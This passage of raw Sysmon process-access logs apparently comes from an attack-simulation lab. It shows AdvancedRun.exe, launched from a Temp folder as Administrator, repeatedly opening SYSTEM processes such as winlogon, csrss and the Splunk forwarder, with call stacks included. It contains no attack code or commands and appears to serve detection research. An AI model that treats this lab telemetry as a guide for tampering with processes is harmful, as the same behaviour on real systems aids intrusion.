Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080488Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080487Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004080486Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.464{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080485Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.464{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080484Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.464{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080483Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.464{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080482Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.463{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080481Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.463{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080480Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.463{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080479Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.463{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080478Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080477Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080476Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004080475Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.462{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMI